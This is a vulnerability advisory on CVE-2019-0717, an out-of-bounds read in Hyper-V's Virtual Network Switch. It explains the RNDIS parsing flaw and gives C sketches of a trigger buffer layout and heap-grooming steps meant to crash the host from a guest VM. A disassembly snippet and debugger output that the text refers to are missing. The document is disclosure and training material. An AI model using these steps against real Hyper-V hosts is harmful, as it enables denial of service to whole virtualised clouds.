Microsoft Hyper-V Virtual Network Switch VmsMpCommonPvtSetRequestCommon Out of Bounds Read

February 15th, 2021 – Alisa Esage

Hyper-V relies on a component named Virtual Network Switch to provide various networking services to virtual machines. Virtual Network Switch (vmswitch.sys) is an RNDIS-compliant virtual device that lives in the kernel of the root partition. It is exposed directly to Generation 2 VMs as a paravirtualized ethernet controller, and used indirectly by Generation 1 VMs as the backend for the emulated DEC ethernet controller. In all cases, vmswitch is the backbone of everything networking-related in a Hyper-V cloud, from providing internet connectivity and virtual LANs to VMs, to bridging all of that into physical ethernet adapters on the host.

Generation 2 VMs talk to vmswitch directly by sending RNDIS protocol data and networking streams over the VMBUS. The vmswitch.sys module in the root partition listens for data availability on the VMBUS in a DPC thread on Windows, which is woken up by a synthetic interrupt generated by the VM. The RNDIS protocol data provided by the VM is then parsed and scheduled for processing in the respective subsystems of the virtual device.
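For reference, the request layout as it appears in the Linux Integration Services sources (drivers/net/hyperv/hyperv_net.h) looks roughly as follows; the header structure is condensed here, and Microsoft's own definitions may differ:

/* Sketch based on the Linux Integration Services definitions in */
/* drivers/net/hyperv/hyperv_net.h; condensed, and possibly differing */
/* from Microsoft's internal headers. */
typedef unsigned int u32;

/* Every RNDIS control message carried over VMBUS starts with a */
/* type/length pair; the request body follows immediately. */
struct rndis_msg_hdr {
  u32 ndis_msg_type;      /* e.g. RNDIS_MSG_SET */
  u32 msg_len;            /* total message length, guest-supplied */
};

/* Body of an RNDIS Set request. The OID selects the handler inside */
/* vmswitch; the InformationBuffer is described by guest-controlled */
/* offset/length fields, counted from the req_id field. */
struct rndis_set_request {
  u32 req_id;
  u32 oid;                /* e.g. RNDIS_OID_GEN_RNDIS_CONFIG_PARAMETER */
  u32 info_buflen;
  u32 info_buf_offset;
  u32 dev_vc_handle;
};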

When vmswitch receives an RNDIS message of type Set, and after a series of data sanitizations, the VmsMpCommonPvtSetRequestCommon() procedure is eventually called to process it. Inside VmsMpCommonPvtSetRequestCommon, one particular path is responsible for handling RNDIS Set requests with the OID RNDIS_OID_GEN_RNDIS_CONFIG_PARAMETER:

At the start of the above code snippet, the $r9 register points to an InformationBuffer of type rndis_config_parameter_info:

/* Linux Integration Services */
/* Format of Information buffer passed in a SetRequest for the OID */
/* OID_GEN_RNDIS_CONFIG_PARAMETER. */
struct rndis_config_parameter_info {
  u32 parameter_name_offset;
  u32 parameter_name_length;
  u32 parameter_type;
  u32 parameter_value_offset;
  u32 parameter_value_length;
};

The contents and the length of this data are fully controlled by the VM.

The four checks in the above snippet correctly validate that the data offsets provided by the rndis_config_parameter_info members fall within the bounds of the request. However, there is a narrow edge case which is not validated. When memcmp() is finally called at 00000001C001FB6E with a static length value of 0x1c, $r15 points to the VM-controlled parameter_name, which can be smaller than 0x1c bytes. If parameter_name is smaller than 0x1c bytes and also falls at the end of an allocated memory page that is adjacent to unallocated space, the root partition OS will bugcheck due to a read access violation.
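To make the edge case concrete, here is a hedged sketch of how a guest might lay out the InformationBuffer so that the fixed-length comparison runs off the end of the allocation. The build_trigger() helper, the chosen name length and the parameter_type value are illustrative assumptions, not the published proof-of-concept:

/* Hypothetical illustration of the trigger layout. The helper name and */
/* constants are assumptions; this is not the original proof-of-concept. */
#include <string.h>

typedef unsigned int u32;
typedef unsigned char u8;

struct rndis_config_parameter_info {
  u32 parameter_name_offset;
  u32 parameter_name_length;
  u32 parameter_type;
  u32 parameter_value_offset;
  u32 parameter_value_length;
};

/* Fill an InformationBuffer of 'buflen' bytes so that parameter_name is */
/* shorter than 0x1c bytes and ends exactly at the end of the buffer. */
/* All offsets stay within the request, so the four bounds checks pass; */
/* if the host-side allocation ends at a page boundary with no mapped */
/* page behind it, the fixed 0x1c-byte memcmp() reads out of bounds. */
static void build_trigger(u8 *buf, u32 buflen)
{
  struct rndis_config_parameter_info *info = (void *)buf;
  u32 name_len = 8;                                /* anything < 0x1c */

  memset(buf, 0, buflen);
  info->parameter_name_length = name_len;
  info->parameter_name_offset = buflen - name_len; /* last bytes of buffer */
  info->parameter_type         = 2;                /* illustrative */
  info->parameter_value_offset = sizeof(*info);
  info->parameter_value_length = 0;
  /* The parameter_name bytes themselves stay zeroed; only their */
  /* placement at the very end of the allocation matters. */
}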

The potential impact of this bug is a persistent DoS of the entire Hyper-V cloud. Exploitation is not straightforward: the heap must be groomed specifically in order to crash a vulnerable Hyper-V host in the absence of specialized debugging instrumentation.

Exploitation notes

It is theoretically possible to exploit this issue without the Driver Verifier enabled, and to cause a persistent DoS in the Hyper-V root partition OS from an arbitrary Guest OS in the default configuration.

First, note that a Guest VM has a significant degree of control over memory management in vmswitch. For example, consider the output from !verifier on the faulting memory:

RndisDevHostDispatchControlMessage in the allocation backtrace is the top-level function that dispatches RNDIS requests from the guest. For each incoming request it allocates memory based on the size of the request as provided by the Guest VM. Thus the Guest VM controls both the timing and the size of memory allocations in vmswitch, which is conducive to heap grooming.
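To illustrate this degree of control, the following guest-side sketch pads an RNDIS Set request to an attacker-chosen total length; the helper name and the assumption that the host-side allocation tracks msg_len closely are mine, not taken from vmswitch internals:

/* Hypothetical guest-side helper: pad an RNDIS Set request so that its */
/* total length -- and hence the size of the allocation made by */
/* RndisDevHostDispatchControlMessage for the host-side copy -- matches */
/* a chosen value. The exact size mapping is an assumption. */
#include <string.h>

typedef unsigned int u32;
typedef unsigned char u8;

#define RNDIS_MSG_SET 0x00000005    /* REMOTE_NDIS_SET_MSG */

struct rndis_msg_hdr {              /* type/length header, see above */
  u32 ndis_msg_type;
  u32 msg_len;
};

static u32 build_padded_set(u8 *out, u32 target_len)
{
  struct rndis_msg_hdr *hdr = (void *)out;

  memset(out, 0, target_len);
  hdr->ndis_msg_type = RNDIS_MSG_SET;
  hdr->msg_len = target_len;        /* guest-chosen total request size */
  /* ... the set-request body and InformationBuffer would follow ... */
  return target_len;
}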

It is not clear whether the Guest VM has the same degree of control over the freeing of memory. The memory allocated for a request is freed once vmswitch has finished processing it. However, a free() primitive may be synthetically constructed (at least) by exploiting the fact that some RNDIS requests take longer to process than others.

The general idea of exploitation is to create an alternating pattern of two types of memory pages: one which is groomed such that our malicious request is the last byte sequence in the page, and another which is either free or may be predictably freed by the VM.

A Type 1 page may be crafted by first flushing the lookaside lists and freelists in the Windows kernel by sending many small RNDIS requests of appropriate sizes, which will trigger the allocation of a new memory page, and then occupying the new page with small allocations in a controlled manner.
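A possible shape of the Type 1 grooming sequence is sketched below; vmbus_send_rndis() is a stand-in for the guest's VMBUS send path, and all counts and sizes are placeholders that depend on the target host's pool configuration:

/* Hypothetical grooming sequence for the 'Type 1' pages. All helper */
/* names, counts and sizes are placeholders; real values depend on the */
/* pool and lookaside configuration of the target host, and the fact */
/* that request buffers are freed after processing requires careful */
/* timing in practice. */
typedef unsigned int u32;
typedef unsigned char u8;

u32 build_padded_set(u8 *out, u32 target_len);   /* see sketch above */
u32 build_trigger_set(u8 *out, u32 target_len);  /* wraps build_trigger() */

/* Stub for the guest-side transport: a real guest would queue the */
/* message on its VMBUS channel and ring the host. */
static void vmbus_send_rndis(const u8 *msg, u32 len) { (void)msg; (void)len; }

#define GROOM_SIZE   0x40     /* illustrative small request size */
#define FLUSH_COUNT  4096     /* drain lookaside lists and freelists */
#define FILL_COUNT   62       /* occupy most of a fresh page */

static u8 buf[0x1000];

void groom_type1_page(void)
{
  u32 len, i;

  /* 1. Drain the lookaside lists and freelists for this size class so */
  /*    that subsequent allocations come from a freshly mapped page. */
  for (i = 0; i < FLUSH_COUNT; i++) {
    len = build_padded_set(buf, GROOM_SIZE);
    vmbus_send_rndis(buf, len);
  }

  /* 2. Occupy the new page with small allocations in a controlled */
  /*    manner, leaving room only at the very end of the page. */
  for (i = 0; i < FILL_COUNT; i++) {
    len = build_padded_set(buf, GROOM_SIZE);
    vmbus_send_rndis(buf, len);
  }

  /* 3. Land the malicious Set request as the last allocation in the */
  /*    page, so that parameter_name ends at the page boundary. */
  len = build_trigger_set(buf, GROOM_SIZE);
  vmbus_send_rndis(buf, len);
}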

A Type 2 page seems trickier to construct, due both to the limitations of the attacker's control over memory freeing and to KASLR mitigations. However, I expect that an unallocated memory page may occur naturally after a Type 1 page under certain conditions, due to KASLR.

After the host BSODs and reboots, the Guest VM will start automatically, and run the exploit again. Thus a persistent DoS of the Hyper-V cloud may be achieved.

This vulnerability and the relevant technical architectural context is further discussed in the "Hypervisor Exploitation I" training.

CVE ID: CVE-2019-0717
Proof-of-concept testcase
Vulnerability discovery: Alisa Esage, Zero Day Engineering

Categories: Vulnerability, Virtualization
